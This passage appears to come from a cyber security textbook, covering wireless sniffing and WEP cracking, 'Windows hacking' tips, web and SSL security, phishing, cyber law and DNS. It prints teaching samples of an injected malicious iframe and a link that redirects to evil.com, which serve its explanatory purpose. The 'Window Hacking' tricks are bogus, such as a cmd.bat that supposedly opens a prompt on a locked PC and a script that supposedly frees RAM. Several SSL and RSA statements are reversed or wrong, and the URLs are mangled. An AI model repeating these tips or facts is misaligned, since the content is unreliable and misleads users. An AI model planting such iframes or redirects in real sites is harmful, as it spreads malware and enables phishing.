An attacker can passively scan without transmitting at all.
Several modes of a station permit this. There is a mode called RF
72
monitor mode that allows every frame appearing on a channel to be
copied as the radio of the station tunes to various channels. This is
analogous to placing a wired Ethernet card in promiscuous mode. This
mode is not enabled by default. Some wireless cards on the market
today have disabled this feature in the default firmware. One can buy
wireless cards whose firmware and corresponding driver software
together permit reading of all raw 802.11 frames. A station in monitor
mode can capture packets without associating with an AP or ad-hoc
network. The so-called promiscuous mode allows the capture of all
wireless packets of an associated network. In this mode, packets cannot
be read until authentication and association are completed.
4.6.7 Detection of SSID
The attacker can discover the SSID of a network usually by
passive scanning because the SSID occurs in the following frame types:
Beacon, Probe Requests, Probe Responses, Association Requests, and
Reassociation Requests. Recall that management frames are always in
the clear, even when WEP is enabled.
On a number of APs, it is possible to configure so that the SSID
transmitted in the Beacon frames is masked, or even turn off Beacons
altogether. The SSID shown in the Beacon frames is set to null in the
hope of making the WLAN invisible unless a client already knows the
correct SSID. In such a case, a station wishing to join a WLAN begins
the association process by sending Probe Requests since it could not
detect any APs via Beacons that match its SSID.
If the Beacons are not turned off, and the SSID in them is not set to
null, an attacker obtains the SSID included in the Beacon frame by
passive scanning.
When the Beacon displays a null SSID, there are two possibilities.
Eventually, an Associate Request may appear from a legitimate station
that already has a correct SSID. To such a request, there will be an
Associate Response frame from the AP. Both frames will contain the
73
SSID in the clear, and the attacker sniffs these. If the station wishes to
join any available AP, it sends Probe Requests on all channels, and
listens for Probe Responses that contain the SSIDs of the APs. The
station considers all Probe Responses, just as it would have with the
non-empty SSID Beacon frames, to select an AP. Normal association
then begins. The attacker waits to sniff these Probe Responses and
extract the SSIDs.
If Beacon transmission is disabled, the attacker has two choices.
The attacker can keep sniffing waiting for a voluntary Associate
Request to appear from a legitimate station that already has a correct
SSID and sniff the SSID as described above. The attacker can also chose
to actively probe by injecting frames that he constructs, and then sniffs
the response.
4.6.8 Collecting the MAC Addresses
The attacker gathers legitimate MAC addresses for use later in
constructing spoofed frames. The source and destination MAC
addresses are always in the clear in all the frames. There are two
reasons why an attacker would collect MAC addresses of stations and
APs participating in a wireless network. (1) The attacker wishes to use
these values in spoofed frames so that his station or AP is not identified.
(2) The targeted AP may be controlling access by filtering out frames
with MAC addresses that were not registered.
4.6.9 Collecting the Frames for Cracking Wired Equivalent Privacy
(WEP)
The goal of an attacker is to discover the WEP shared-secret key.
Often, the shared key can be discovered by guesswork based on a
certain amount of social engineering regarding the administrator who
configures the wireless LAN and all its users. Some client software
stores the WEP keys in the operating system registry or initialization
scripts. In the following, we assume that the attacker was unsuccessful
in obtaining the key in this manner. The attacker then employs
74
systematic procedures in cracking the WEP. For this purpose, a large
number (millions) of frames need to be collected because of the way
WEP works.
The wireless device generates on the fly an Initialization Vector
(IV) of 24-bits. Adding these bits to the shared-secret key of either 40 or
104 bits, we often speak of 64-, or 128-bit encryption. WEP generates a
pseudo-random key stream from the shared secret key and the IV. The
CRC-32 checksum of the plain text, known as the Integrity Check (IC)
field, is appended to the data to be sent. It is then exclusive-ORed with
the pseudo-random key stream to produce the cipher text. The IV is
appended in the clear to the cipher text and transmitted. The receiver
extracts the IV, uses the secret key to re-generate the random key
stream, and exclusive-ORs the received cipher text to yield the original
plaintext.
Certain cards are so simplistic that they start their IV as 0 and
increment it by 1 for each frame, resetting in between for some events.
Even the better cards generate weak IVs from which the first few bytes
of the shared key can be computed after statistical analysis. Some
implementations generate fewer mathematically weak vectors than
others do.
The attacker sniffs a large number of frames from a single base
station subsystem (BSS). These frames all use the same key. The
mathematics behind the systematic computation of the secret shared
key from a collection of cipher text extracted from these frames is
described elsewhere in this volume. What is needed however is a
collection of frames that were encrypted using "mathematically-weak"
IVs. The number of encrypted frames that were mathematically weak is
a small percentage of all frames. In a collection of a million frames, there
may only be a hundred mathematically weak frames. It is conceivable
that the collection may take a few hours to several days depending on
how busy the WLAN is.
75
Given a sufficient number of mathematically weak frames, the
systematic computation that exposes the bytes of the secret key is
intensive. However, an attacker can employ powerful computers. On
an average PC, this may take a few seconds to hours. The storage of the
large number of frames is in the several hundred-mega bytes to a few
giga bytes range.
4.6.10 Detection of the Sniffers
Detecting the presence of a wireless sniffer, who remains radio-
silent, through network security measures is virtually impossible.
Once the attacker begins probing (i.e., by injecting packets), the
presence and the coordinates of the wireless device can be detected.
4.7 WINDOW HACKING
Open COMMAND PROMPT while Locked by User.
>open notepad
>type www.command.com
> then save as cmd.bat at desktop
>then enter now its open.....enjoy
>>If your computer is slow?
Then clean up the ram...
>Open notepad
>type FREEMEM=SPACE (64000000)
>Save it as ram.vbs
now run the script.
Check out!!
>>CracK BIOS Password
>Open the CPU
>Observe the Motherboard
76
>Remove the Silver Battery (3v)
>Wait 2 minutes and place the Battery
>>Restoring a Lost Desktop-
>Start
>Run
Type a period "."
Then press Enter
>>If ur PC is hanged then do this
Press shift+ctrl+esc or ctrl+alt+Del
n den click on 'END TASK’
your PC is running now.
>>create folder without name
>select any folder
>rename it
>press alt & type 0160 or 255
>enter
>>Amazing trick for use
Windows Backup Utility if installed
go to run
type ntbackup
ok
Now use backup
>>Increase the speed of your file sharing
Simple Way to Share Multiple Folders:
77
Goto Run and Type SHRPUBW.EXE then press Enter
Select the folder you want to share and Set permissions,
your share folder is ready now.....
>>Turning off the Help on Min, Max, Close Icons
When the mouse goes over the minimize, maximize and close icons on
the upper
right hand side of a window.
To disable that display:
1. Start Regedit
2. Go to HKEY_CURRENT_USER \ Control Panel \ Desktop
3. Create a String Value called MinMaxClose
4. Give it a value of 1
5. Reboot
4.8 WEB HACKING
Web security involves threats (hackers, website malware, devious ex-
friends and so on) looking to exploit vulnerabilities in your website as
simple as weak passwords all the way to more technical flaws such as
cross-site scripting and SQL injection
Ÿ Web Risks - server content / communications
Ÿ Solutions - SSL / S-HTTP / SET (evolving stds)
Ÿ SSL (Secure Sockets Layer) - session protection
Ÿ Developed by Netscape to add communication protection
Ÿ New layer protocol operating above TCP protocol
Ÿ Protects any application protocol normally operating over TCP

(HTTP, FTP, TELNET)
Ÿ HTTPs represents SSL communication handling
78
Ÿ Services: server authentication / client authentication / integrity
(check values) / confidentiality (encryption).
4.8.1 Web Security (SSL)
SSL has two sub-protocols
Ÿ SSL Record Protocol - defines basic format
Ÿ Compression/MAC/encryption/data length
Ÿ Assumes pre-existing keys
Ÿ SSL Handshake Protocol - coordination
Ÿ Negotiates protection algorithms between client and server for

authentication, transmission of key certificates, establish session
keys for use in integrity check and encryption
Ÿ Domestic (128-bit) and internal (40-bit).
4.8.2 Web Security - S-HTTP

Ÿ Secure HTTP - security extension
Ÿ Protects individual transaction request or response messages,

similar to e-mail
Ÿ Services: authentication, integrity, confidentiality + digital
signatures (adds non-repudiation)
Ÿ Flexibility in how messages are protected and key management.
4.8.3 Web Security Threats

Ÿ Executable Programs - no foolproof defense
Ÿ Java Applets - execution occurs on client system
Ÿ Trusted execution environment (sandbox)
Ÿ Should not: inspect or alter client files, run system commands or load
system s/w libraries
Ÿ Should: contact only originating server
79
Ÿ Potential for hostile applets to send forged e-mail, crash browsers,
kill running applets, consume resources
Ÿ Active-X - reusable software components
Ÿ Source Authentication Programs -read signed code.

4.8.4 Web Security on two sides
Ÿ Web browser
Ÿ Can be attacked by any web site it visits
Ÿ Attacks result in:
Ÿ Malware installation (key loggers, bot-nets)
Ÿ Document theft from corporate network
Ÿ Loss of private data.
Ÿ Web application code
Ÿ Runs at web site, e.g. banks, e-merchants, blogs
Ÿ Written in PHP, ASP, JSP, Ruby, …
Ÿ Many potential bugs: XSS, XSRF, SQL injection
Ÿ Attacks lead to stolen CC#, defaced sites, mayhem.

4.8.5 HTTP Authentication
Ÿ Protect web content from those who don't have a "need to know"
Ÿ Require users to authenticate using a userid/password before they

are allowed access to certain URLs
Ÿ HTTP/1.1 requires that when a user makes a request for a protected
resource the server responds with a authentication request header
Ÿ WWW-Authenticate
Ÿ Contains enough pertinent information to carry out a "challenge-

response" session between the user and the server.
80
Fig 4.6 Web Authentication

4.8.6 Client Response
Ÿ Well established clients like Firefox, Internet Explorer …. will
respond to the challenge request (WWW-Authenticate) by
presenting the user with a small pop-up window with data entry
fields for
Ÿ userid
Ÿ password
Ÿ a Submit button and a Cancel button
Ÿ Entering a valid userid and password will post the data to the server,
the server will attempt authentication and if authenticated will serve
the originally requested resource.
4.8.7 WWW-Authenticate
Ÿ The authentication request received by the browser will look
something like:
Ÿ WWW-Authenticate = Basic realm="defaultRealm"
Ÿ Basic indicates the HTTP authentication is requested
Ÿ realm indicates the context of the login
Ÿ realms hold all of the parts of security puzzle
Ÿ Users
Ÿ Groups
Ÿ ACLs (Access Control Lists)
Ÿ Basic Authentication
81
Ÿ User id and password are sent base 64 encoded (might as well be
plain text)
Ÿ A replay attack is an attack where an authentication session is
replayed by an attacker to fool a computer into granting access.
Ÿ Digest Authentication
Ÿ attempts to overcome the shortcomings of Basic Authentication
Ÿ WWW-Authenticate = Digest realm="defaultRealm"
nonce="Server Specific String"
Ÿ see RFC 2069 for description of nonce, each nonce is different
Ÿ the nonce is used in the browser in a 1-way function (MD5, SHA-
1….) to encode the userid and password for the server, this
function essentially makes the password good for only one time
Ÿ Common browsers don't use Digest Authentication but an applet
has access to all of the Java Encryption classes needed to create the
creation of a Digest.
Ÿ Secure Sockets Layer (SSL)
Ÿ Invented by Netscape and made public domain for everyone's
use
Ÿ An additional layer to the TCP/IP stack that sits between the
Application and Transport layers
Ÿ ensures that all application data is encrypted but TCP/IP headers
are not
Ÿ usually run on port 443 (default HTTPS port)
Ÿ Public Key Cryptography
Ÿ Owner of a private key sends a public key to all who want to
communicate with him (keys are both prime factors of a large
(1024 bit) number). Owner keeps the private key secret and uses it
to decrypt information sent to him that has been encrypted with
the public-key
Ÿ RSA algorithm is most notable public-key cipher algorithm
Ÿ Digital Certificates
Ÿ Issued by a disinterested third party (ex. VeriSign)
82
Ÿ The Certificate contains the public-key for the specific Web Server
and a digital signature of the certifying authority.
4.8.8 Back to SSL
Ÿ Once a secure session is established the source requests the
destinations certificate ( sent in the http header (unencrypted))
Ÿ Once the source accepts the authenticity of the certificate it uses the
public-key from the certificate to encrypt the generated session key
for protecting the conversation between the source and destination.
Ÿ Session is encrypted using a symmetric cipher (slow)
Ÿ conversation is encrypted using an asymmetric cipher (fast)
Ÿ it's done this way to speed up overall communications, strong

encryption (slow) is used as little as possible while weaker
encryption is used for most exchanges
Ÿ actual cipher algorithms are negotiated on a per-session basis
Fig 4.7 Real and Fake K-State

Fake and Malicious Attacks in Web Pages
83
Fig 4.8 Attacks in Webpages

Spear phishing scam received by K-Staters in January 2010.
"Phishing" scams try to trick you into providing private information,
like a password or bank account info.
"Spear phishing”
Targets a specific population - in this case, K-State email users.
Fig 4.9 Malicious Link
84
The malicious link in the email took you to an exact replica of K-State's
single sign-on web page hosted on a server in the Netherlands which
will steal your email ID and password if you enter it and "Sign in". Note
the URL highlighted in red - "flushandfloose.nl", which is obviously not
k-state.edu
Fig 4.10 Fake and Real SSO Web Page
Fig 4.11 Webpage Validation

85
Result of clicking on eID verification badge on a legitimate K-State web
site that uses the eID and password for authentication.
Fig 4.12 ID Verification

4.8.9 Malicious Advertisements
Ÿ Major ad networks (aka "ad aggregators") affiliated with Google (e.g.
Doubleclick.com), Yahoo (yieldmanager.com), Fox and others,
covering more than 50% of online ads, have been infiltrated with
"poisoned ads" containing malicious code (Source: Avast!)
Ÿ Happened to the New York Times website last fall.
4.8.10 Recognizing Fake Antivirus Alerts
Example of a Fake AV "scareware" alert that tries trick you into
buying worthless software to fix a non-existent infection:
Fig 4.13 Fake Antivirus Alerts
86
a. Malware Attacker
Ÿ Browsers (like any software) contain exploitable bugs
Ÿ Often enable remote code execution by web sites
Ÿ Google study: [the ghost in the browser 2007]

Ÿ Found Trojans on 300,000 web pages (URLs)
Ÿ Found adware on 18,000 web pages (URLs)
Today: even if browsers were bug-free, still lots of vulnerabilities on the

web exist.
b. Malware Distribution
Ÿ Via vulnerable web servers:
<! -- Copyright Information -->

<div align='center' class='copyright'>Powered by … </div>
<iframesrc='http://wsfgfdgrtyhgfd.net/adv/193/new.php'></iframe>
Ÿ Via ad networks:
Ÿ User visits a reputable web site containing banner ad
Ÿ Banner ad hosted in iframe from 3rd party site
Ÿ 3rd party serves ad exploiting browser bug
Ÿ often involves 4th and 5th parties
Ÿ Example: feb. 2008:
Ÿ ad serves PDF file that exploits adobe reader bug
Ÿ Installs Zonebac: modifies search engine results
4.8.11 Security User Interface Address Bar

Ÿ Where this page came from
87
Fig 4.14 Security User Interface

Ÿ But not where the embedded content came from
4.8.12 URLs
Global identifiers of network-retrievable documents
Protocol
Fragment
Hostname Port Path
Query
Fig 4.15 Global Identifiers

Ÿ Special characters are encoded as hex:
Ÿ %0A = newline
Ÿ %20 or + = space, %2B = + (special exception)
88
4.8.13 HTTP Request
Fig 4.16 HTTP Request

4.8.14 HTTP Response
Fig 4.17 HTTP Response

Mixed Content: HTTP and HTTPS
Ÿ Page loads over HTTPS, but contains content over HTTP
Ÿ IE: displays mixed-content dialog to user
89
Ÿ Flash files over HTTP are loaded with no warning (!)
Ÿ Note: Flash can script the embedding page
Ÿ Firefox: displays a red slash over lock icon (no dialog)
Ÿ Flash files over HTTP do not trigger the slash
Ÿ Safari: does not attempt to detect mixed content
a. Mixed content: HTTP and HTTPS
Fig 4.18 Mixed Content

b. Mixed content and network attacks
Ÿ banks: after login all content served over HTTPS
Ÿ Developer error: Somewhere on bank site write

<Script src=http://www.site.com/script.js> </script>
Ÿ Active network attacker can now hijack any session.
Ÿ Better way to include content:
90
<script src=//www.site.com/script.js> </script>
Served over the same protocol as embedding page
Lock Icon 2.0
Ÿ Extended Validation (EV) certs
Fig 4.19 EV Certificates

Ÿ Prominent security indicator for EV certificates
Ÿ note: EV site loading content from non-EV site does not trigger
mixed content warning
c. Picture-in-Picture Attacks
Fig 4.20 Picture - in -Picture

Trained users are more likely to fall victim to this.
91
d. Finally: the Status Bar
Fig 4.21 Status Bar

Trivially spoof able
<a href="http://www.paypal.com/"
onclick="this.href = 'http://www.evil.com/';">
PayPal</a>
4.9 ETHICAL HACKING
An ethical hacker is a computer and network expert who attacks a
security system on behalf of its owners, seeking vulnerabilities that a
malicious hacker could exploit. To test a security system, ethical hackers
use the same methods as their less principled counterparts, but report
problems instead of taking advantage of them. Ethical hacking is also
known as penetration testing, intrusion testing and red teaming. An
ethical hacker is sometimes called a white hat, a term that comes from
old Western movies, where the "good guy" wore a white hat and the
"bad guy" wore a black hat.
One of the first examples of ethical hackers at work was in the
1970s, when the United States government used groups of experts
called red teams to hack its own computer systems. According to Ed
Skoudis, Vice President of Security Strategy for Predictive Systems'
Global Integrity consulting practice, ethical hacking has continued to
grow in an otherwise lackluster IT industry, and is becoming
increasingly common outside the government and technology sectors
where it began. Many large companies, such as IBM, maintain
employee teams of ethical hackers.
92
4.10 QUESTIONS
Give Short Answers
1. Define password cracking.
2. Name the methods to crack the password.
3. Define Phishing.
4. What is the purpose of Port Scanning?
5. Can the wireless networks be hacked? Justify.
6. What is Sniffing?
7. What is the purpose of passive scanning?
8. Why the attacker is collecting the MAC addresses?
9. How will you detect the sniffer?
1. How can network be hacked?
2. Elucidate some phishing techniques.
3. How will you prevent the password from the hackers?
4. Illustrate the layers of wireless LAN.
5. Compare and contrast black hat hackers and white hat hackers.
6. Do the service providers need 802.11 frames to the access point?
Justify.
7. Why the hackers collect the frames for cracking web?
93
UNIT V
Cyber Law, Case Studies:
DNS, IP Sec & Social Media
5.1 What is Cyber Law?
Cyber Law is the law governing cyber space. Cyber space is a very
wide term and includes computers, networks, software, data storage
devices (such as hard disks, USB disks etc), the Internet, websites,
emails and even electronic devices such as cell phones, ATM machines
etc.
Law encompasses the rules of conduct:
1. That have been approved by the government, and
2. Which are in force over a certain territory, and
3. Which must be obeyed by all persons on that territory.
Violation of these rules could lead to government action such as
imprisonment or fine or an order to pay compensation.
Cyber law encompasses laws relating to:
1. Cyber Crimes
2. Electronic and Digital Signatures
3. Intellectual Property
4. Data Protection and Privacy
Cyber crimes are unlawful acts where the computer is used either
as a tool or a target or both. The enormous growth in electronic
commerce (e-commerce) and online share trading has led to a
phenomenal spurt in incidents of cyber crime. These crimes are
discussed in detail further in this chapter.
Electronic signatures are used to authenticate electronic records.
Digital signatures are one type of electronic signature. Digital
signatures satisfy three major legal requirements - signer
authentication, message authentication and message integrity. The
technology and efficiency of digital signatures make them more
trustworthy than hand written signatures.
97
Intellectual property refers to creations of the human mind e.g. a story, a
song, a painting, a design etc. The facets of intellectual property that
relate to cyber space are covered by cyber law.
These include:
Ÿ Copyright law - in relation to computer software, computer source
code, websites, cell phone content etc,
Ÿ Software and source code licenses
Ÿ Trademark law - with relation to domain names, Meta tags,

mirroring, framing, linking etc
Ÿ Semiconductor law - which relates to the protection of
semiconductor integrated circuits design and layouts?
Ÿ Patent law - in relation to computer hardware and software.
Data protection and privacy laws aim to achieve a fair balance

between the privacy rights of the individual and the interests of data
controllers such as banks, hospitals, email service providers etc. These
laws seek to address the challenges to privacy caused by collecting,
storing and transmitting data using new technologies.
5.2 Need for Cyber Law
There are various reasons why it is extremely difficult for
conventional law to cope up with cyberspace. Some of these are
discussed below.
1. Cyberspace is an intangible dimension that is impossible to
govern and regulate using conventional law.
2. Cyberspace has complete disrespect for jurisdictional
boundaries. A person in India could break into a bank's electronic vault
hosted on a computer in India and transfer millions of Rupees to
another bank in Singapore, all within minutes. All he would need is a
laptop computer and a cell phone.
98
3. Cyberspace handles gigantic traffic volumes every second.
Billions of emails are crisscrossing the globe even as we read this,
millions of websites are being accessed every minute and billions of
dollars are electronically transferred around the world by banks every
day.
4. Cyberspace is absolutely open to participation by all. A ten-year-
old in Bhutan can have a live chat session with an eight-year-old in Bali
without any regard for the distance or the anonymity between them.
5. Cyberspace offers enormous potential for anonymity to its
members. Readily available encryption software and steganographic
tools that seamlessly hide information within image and sound files
ensure the confidentiality of information exchanged between cyber-
citizens.
6. Cyberspace offers never-seen-before economic efficiency. Billions
of dollars worth of software can be traded over the Internet without the
need for any government licenses, shipping and handling charges and
without paying any customs duty.
7. Electronic information has become the main object of cyber crime.
It is characterized by extreme mobility, which exceeds by far the
mobility of persons, goods or other services. International computer
networks can transfer huge amounts of data around the globe in a
matter of seconds.
8. A software source code worth crores of rupees or a movie can be
pirated across the globe within hours of their release.
9. Theft of corporeal information (e.g. books, papers, CD ROMs,
floppy disks) is easily covered by traditional penal provisions.
However, the problem begins when electronic records are copied
quickly, inconspicuously and often via telecommunication facilities.
Here the "original" information, so to say, remains in the "possession" of
the "owner" and yet information gets stolen.
99
5.3 Advantages of Cyber Laws
The IT Act 2000 attempts to change outdated laws and provides
ways to deal with cyber crimes. We need such laws so that people can
perform purchase transactions over the Net through credit cards
without fear of misuse. The Act offers the much-needed legal
framework so that information is not denied legal effect, validity or
enforceability, solely on the ground that it is in the form of electronic
records.
In view of the growth in transactions and communications carried
out through electronic records, the Act seeks to empower government
departments to accept filing, creating and retention of official
documents in the digital format. The Act has also proposed a legal
framework for the authentication and origin of electronic records /
communications through digital signature.
* From the perspective of e-commerce in India, the IT Act 2000 and its
provisions contain many positive aspects. Firstly, the implications of
these provisions for the e-businesses would be that email would now be
a valid and legal form of communication in our country that can be duly
produced and approved in a court of law.
* Companies shall now be able to carry out electronic commerce using
the legal infrastructure provided by the Act.
* Digital signatures have been given legal validity and sanction in the
Act.
* The Act throws open the doors for the entry of corporate companies in
the business of being Certifying Authorities for issuing Digital
Signatures Certificates.
* The Act now allows Government to issue notification on the web thus
heralding e-governance.
* The Act enables the companies to file any form, application or any
other document with any office, authority, body or agency owned or
100
controlled by the appropriate Government in electronic form by means
of such electronic form as may be prescribed by the appropriate
Government.
* The IT Act also addresses the important issues of security, which are
so critical to the success of electronic transactions. The Act has given a
legal definition to the concept of secure digital signatures that would be
required to have been passed through a system of a security procedure,
as stipulated by the Government at a later date.
* Under the IT Act, 2000, it shall now be possible for corporates to have a
statutory remedy in case if anyone breaks into their computer systems
or network and cause losses damages or copies data. The remedy
provided by the Act is in the form of monetary damages, not exceeding
Rs. 1 crore.
5.4 DOMAIN NAME SYSTEM (DNS)
Definition: The DNS translates Internet domain and host names
to IP addresses. DNS automatically converts the names user type in our
Web browser address bar to the IP addresses of Web servers hosting
those sites.
The Domain Name System converts machine names to IP
addresses. The mapping is done from name to address and address to
name. The difference between just plain hosts IP mapping and Domain
mapping is that DNS uses a hierarchical naming standard. This
hierarchy works from right-to-left with the highest level being on the
right.
As an example, here is a simple domain
TOP-LEVEL .org
|
MID-LEVEL .diverge.org
______________________|________________________
| | |
101
BOTTOM-LEVEL strider.diverge.org samwise.diverge.org
wormtongue.diverge.org
It seems simple enough; however, the system can also be logically
divided even further if one wishes at different points. The example
shown above shows three nodes on the diverge.org domain, but we
could even divide diverge.org into sub domains such as
strider.net1.diverge.org, samwise.net2.diverge.org and
wormtongue.net2.diverge.org, in this case, 2 nodes reside on
net2.diverge.org and one on net1.diverge.org.
5.4.1 Overview of the DNS
To connect to a system that supports IP, the host initiating the
connection must know in advance the IP address of the remote system.
An IP address is a 32-bit number that represents the location of the
system on a network. The 32-bit address is separated into four octets
and each octet is typically represented by a decimal number. The four
decimal numbers are separated from each other by a dot character (".").
Even though four decimal numbers may be easier to remember than
thirty-two 1's and 0's, as with phone numbers, there is a practical limit as
to how many IP addresses a person can remember without the need for
some sort of directory assistance. The directory essentially assigns host
names to IP addresses.
The Stanford Research Institute's Network Information Center
(SRI-NIC) became the responsible authority for maintaining unique
host names for the Internet. The SRI-NIC maintained a single file, called
hosts.txt, and sites would continuously update SRI-NIC with their host
name to IP address mappings to add to, delete from, or change in the
file. The problem was that as the Internet grew rapidly, so did the file
causing it to become increasingly difficult to manage. Moreover, the
host names needed to be unique throughout the worldwide Internet.
With the growing size of the Internet it became more and more
impractical to guarantee the uniqueness of a host name. The need for
such things as a hierarchical naming structure and distributed
102
management of host names paved the way for the creation of a new
networking protocol that was flexible enough for use on a global scale.
What evolved from this is an Internet distributed database that maps
the names of computer systems to their respective numerical IP
network address (es). This Internet lookup facility is the DNS.
Important to the concept of the distributed database is delegation of
authority. No longer is one single organization responsible for host
name to IP address mappings, but rather those sites that are responsible
for maintaining host names for their organization(s) can now regain
that control.
5.4.2 Fundamentals of DNS
The DNS not only supports host name to network address
resolution, known as forward resolution, but it also supports network
address to host name resolution, known as inverse resolution. Due to its
ability to map human memorable system names into computer network
numerical addresses, its distributed nature, and its robustness, the DNS
has evolved into a critical component of the Internet. Without it, the
only way to reach other computers on the Internet is to use the
numerical network address. Using IP addresses to connect to remote
computer systems is not a very user-friendly representation of a
system's location on the Internet and thus the DNS is heavily relied
upon to retrieve an IP address by just referencing a computer system's
Fully Qualified Domain Name (FQDN).
Fully Qualified Domain Name (FQDN) : A FQDN is basically a
DNS host name and it represents where to resolve this host name within
the DNS hierarchy.
5.4.3 The Domain Name Space
The DNS is a hierarchical tree structure whose root node is known
as the root domain. A label in a DNS name directly corresponds with a
node in the DNS tree structure. A label is an alphanumeric string that
uniquely identifies that node from its neighbours. Labels are connected
103
together with a dot notation, ".", and a DNS name containing multiple
labels represents its path along the tree to the root. Labels are written
from left to right. Only one zero length labels are allowed and are
reserved for the root of the tree. This is commonly referred to as the root
zone. Due to the root label being zero length, all FQDNs end in a dot.
Least
Root “.” specific
Org Com
Plain Example Example
Sample WWW
Testbed
Most
Host FODNs: specific
1 host1.sample.plain.org.
www.example.org.testbe
d.example.com
Fig 5. 1 Domain Name Space example

As a tree is traversed in an ascending manner (i.e., from the leaf
nodes to the root), the nodes become increasingly less specific (i.e., the
leftmost label is most specific and the right most label is least specific).
Typically in an FQDN, the left most labels is the host name, while the
next label to the right is the local domain to which the host belongs. The
local domain can be a sub domain of another domain. The name of the
104
parent domain is then the next label to the right of the sub domain (i.e.,
local domain) name label, and so on, till the root of the tree is reached.
5.4.4 DNS Components
The DNS has three major components,
Ÿ Database
Ÿ Server
Ÿ Client
The database is a distributed database and is comprised of the

Domain Name Space, which is essentially the DNS tree, and the
Resource Records (RRs) that define the domain names within the
Domain Name Space. The server is commonly referred to as a name
server. Name servers are typically responsible for managing some
portion of the Domain Name Space and for assisting clients in finding
information within the DNS tree. Name servers are authoritative for the
domains in which they are responsible. They can also serve as a
delegation point to identify other name servers that have authority over
sub domains within a given domain.
The RR data found on the name server that makes up a domain is
commonly referred to as zone information. Thus, name servers have
zones of authority. A single zone can either be a forward zone (i.e., zone
information that pertains to a given domain) or an inverse zone (i.e.,
zone information that maps IP addresses into DNS host names). DNS
allows more than one name server per zone, but only one name server
can be the primary server for the zone. Primary servers are where the
actual changes to the data for a zone take place. All the other name
servers for a zone basically maintain copies of the primary server's
database for the zone. These servers are commonly referred to as
secondary servers.
A DNS RR has 6 fields: NAME, TYPE, CLASS, TTL, RD Length,
and RDATA are presented in table. The NAME field holds the DNS
105
name, also referred to as the owner name, to which the RR belongs. The
TYPE field is the TYPE of RR. This field is necessary because it is not
uncommon for a DNS name to have more than one type of RR.
The more common types of RR are:
RECORD TYPE DESCRIPTIONUSAGE
A An address record Maps FQDN into an IP address
PTR A pointer record Maps an IP address into FQDN
NS A name server record Denotes a name server for a zone
SOA A Start of Authority Specifies many attributes

record concerning the zone, such as
the name of the domain
(forward or inverse),
administrative contact, the
serial number of the zone,
refresh interval, retry interval, etc.
CNAME A canonical name record Defines an alias name and maps

it to the absolute (canonical)
name
MX A Mail Exchanger record Used to redirect email for a

given domain or host to another
host
Common DNS Resource Records
Ÿ The CLASS in this case is "IN" which stands for Internet. Other
classes exist but are omitted for brevity.
Ÿ The TTL is the time, in seconds, that a name server can cache a RR. A
zero time to live means that a server is not to cache the RR.
106
Ÿ RD Length is the RDATA field's length in octets. The RDATA field is
the resource data field and is uniquely defined for each TYPE of RR,
but in general it can be thought of as the value into which the entity
specified in the NAME field maps.
Ÿ The NAME field can be thought of as the subject of a query, although
this is not always the case, and the answer is the data contained in the
RDATA field (even though the entire RR is returned in a DNS
response).
Ÿ RRs are grouped into resources records sets (Resets). RRSets contain
0 or more RRs that have the same DNS name, class, and type, but the
data (i.e., RDATA) is different. If the name, class, type, and data are
the same for two or more records then duplicate records exist for the
same DNS name. Name servers should suppress duplicate records.
example.com. IN NS ns1.example.com.
example.com. IN NS ns2.example.com.
example.com. IN NS ns.plain.org.
These three records are grouped into an RRSet.
The client component of the DNS typically contains software
routines, known as functions, which are responsible for requesting
information from the Domain Name Space on behalf of an application.
These functions are bundled together into a software library that is
commonly referred to as the resolver library. For this reason, clients are
often called resolvers. The resolver library functions are responsible for
sending a query to a name server requesting information concerning a
DNS name and returning the answer to the query back to the requestor.
DNS is hierarchical in structure. A domain is a sub tree of the
domain name space. From the root, the assigned top-level domains are:
Ÿ GOV - Government.
Ÿ EDU - Education.
Ÿ INT - International organization
107
Ÿ NET - Networks
Ÿ COM - Commercial entity.
Ÿ MIL - U. S. Military.
Ÿ ORG - Any other organization not previously listed.
Each node on the domain name system is separated by a ".".

Example : "mymachine.mycompany.com." Note that any name ending
in a "." is an absolute domain name since it goes back to root.
5.4.5 DNS Transactions
DNS transactions occur continuously across the Internet. The two
most common transactions are DNS zone transfers and DNS
queries/responses. A DNS zone transfer occurs when the secondary
server updates its copy of a zone for which it is authoritative. The
secondary server makes use of information it has on the zone, namely
the serial number, and checks to see if the primary server has a more
recent version. If it does, the secondary server retrieves a new copy of
the zone.
A DNS query is answered by a DNS response. Resolvers use a finite
list of name servers, usually not more than three, to determine where to
send queries. If the first name server in the list is available to answer the
query, then the others in the list are never consulted. If it is unavailable,
each name server in the list is consulted until one is found that can return
an answer to the query. The name server that receives a query from a
client can act on behalf of the client to resolve the query. Then the name
server can query other name servers one at a time, with each server
consulted being presumably closer to the answer. The name server that
has the answer sends a response back to the original name server, which
then can cache the response and send the answer back to the client. Once
an answer is cached, a DNS server can use the cached information when
responding to subsequent queries for the same DNS information.
Caching makes the DNS more efficient, especially when under heavy
load. This efficiency gain has its tradeoffs; the most notable is in security.
108
The DNS has a defined message protocol for queries and
responses. A DNS message has five sections, a Header section, a
Question section, an Answer section, an Authority section and an
Additional section. The header section contains information such as the
type of message and what other sections are present in the message. The
Question section contains the information concerning the object of the
query. The last three sections are filled with RRs when appropriate. The
Answer section contains RRs specifically pertaining to the answer. The
Authority section is filled with either SOA or NS records belonging to
the zone of authority for the owner name of the RR(s) in the Answer
section. The Additional section may potentially have additional
information that the receiver may find of interest.
HEADERQUESTIONANSWERAUTHORITYADDITIONAL
HEADER QUESTION ANSWER AUTHORITY ADDITIONAL
Fig 5.2 DNS Message Format

5.4.6 Threats to the Domain Name System
The original DNS specifications did not include security based on
the fact that the information that it contains, namely host names and IP
addresses, is used as a means of communicating data [SPAF]. As more
and more IP based applications developed, the trend for using IP
addresses and host names as a basis for allowing or disallowing access
(i.e., system based authentication) grew. UNIX saw the advent of
Berkeley "r" commands (e.g., rlogin, rsh, etc.) and their dependencies on
host names for authentication. Then many other protocols evolved with
similar dependencies, such as Network File System (NFS), X windows,
Hypertext Transfer Protocol (HTTP), et al.
Another contributing factor to the vulnerabilities in the DNS is
that the DNS is designed to be a public database in which the concept of
109
restricting access to information within the DNS name space is
purposely not part of the protocol. Later versions of the BIND
implementation allow access controls for such things as zone transfers,
but all in all, the concept of restricting who can query the DNS for RRs is
considered outside the scope of the protocol.
The existence and widespread use of such protocols as the r-
commands put demands on the accuracy of information contained in
the DNS. False information within the DNS can lead to unexpected and
potentially dangerous exposures. The majority of the weaknesses
within the DNS fall into one of the following categories: Cache
poisoning, client flooding, dynamic update vulnerability, information
leakage, and compromise of the DNS server's authoritative database.
